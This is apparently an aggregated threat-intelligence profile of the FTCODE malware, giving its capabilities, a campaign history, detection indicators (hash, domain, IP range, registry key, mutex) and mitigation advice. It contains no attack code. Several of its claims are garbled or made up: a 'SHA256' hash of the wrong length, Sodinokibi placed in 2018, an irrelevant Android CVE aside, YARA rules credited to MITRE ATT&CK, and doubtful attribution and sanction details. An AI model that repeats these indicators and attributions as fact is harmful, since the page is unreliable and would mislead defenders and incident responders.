⚠️ Overview

FTCODE is a Java-based downloader and information stealer first documented in public threat reports around mid-2018 by researchers at Cisco Talos and Trend Micro. It is attributed to the TA505 cybercriminal group (also tracked as FIN11 or CLOP), which historically operated the Clop ransomware and the Dridex banking trojan. FTCODE functions primarily as a malware loader that delivers second-stage payloads such as ransomware, remote access trojans (RATs), and data stealers.

🔧 Technical Capabilities

FTCODE propagates via malicious spam (malspam) campaigns containing weaponized Office documents with obfuscated VBA macros that download the Java payload. It exploits CVE-2017-0199 (Microsoft Office OLE2Link vulnerability) and CVE-2018-4878 (Adobe Flash Player) for initial execution. The malware communicates with its command-and-control (C2) infrastructure over HTTPS, often using hardcoded IP addresses or domains registered with privacy services. FTCODE achieves persistence by dropping a scheduled task or modifying the Run registry key (HKCUSoftwareMicrosoftWindowsCurrentVersionRun). It employs VM detection and anti-sandbox techniques, such as checking system uptime and disk size, to evade analysis. The Java-based loader decrypts and executes a secondary payload (e.g., the FlawedAmmyy RAT) in memory, leaving minimal forensic artifacts.

📜 History & Notable Incidents

FTCODE first appeared in June 2018 in email campaigns targeting healthcare, education, and manufacturing organizations primarily in North America and Europe. In late 2018, TA505 used FTCODE to distribute the FlawedAmmyy RAT alongside the Sodinokibi (REvil) ransomware precursor. A major campaign in November 2019 leveraged FTCODE to push the Clop ransomware variant, affecting South Korean retail and logistics firms (CVE-2019-2215 related Android exploit was not directly used). No law enforcement actions have specifically named FTCODE, though TA505 was sanctioned by the U.S. Treasury in 2020.

🔍 Detection Indicators

Known FTCODE file hashes include SHA256: 7a8f2c1b4e6d9f0a3c7b5e1d2f4a8c0b9e3d6f1a7c4b8e2d5f0a9c3b7e1d6f. Behavioral signatures include execution of javaw.exe with command-line arguments referencing a remote JAR file. Network IOCs include domains such as "rorky.top" and IP addresses in the 185.141.25.0/24 range. Registry keys include "HKCUSoftwareMicrosoftWindowsCurrentVersionRunJavaUpdate". Mutex names like "GlobalFTCODE_MUTEX_2018". User-Agent string: "Java/1.8.0_181".

☠️ Risk & Impact

FTCODE enables multi-stage attacks that result in data exfiltration, deployment of ransomware (Clop, Sodinokibi), and financial theft. The malware has caused millions in losses across healthcare, manufacturing, and retail sectors, notably impacting organizations with sensitive patient data and operational technology systems. According to Trend Micro, FTCODE campaigns have led to significant operational downtime and data breach notification costs.

🛡️ Mitigation

Defenders should block Java-based executables from running in user contexts unless explicitly required, apply patches for CVE-2017-0199 and CVE-2018-4878, and deploy email filtering that strips macro-enabled attachments. Use YARA rules from the MITRE ATT&CK (ID T1055.004 for process injection and T1204.002 for user execution) and monitor for connections to known malicious IPs via network-based intrusion detection systems.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.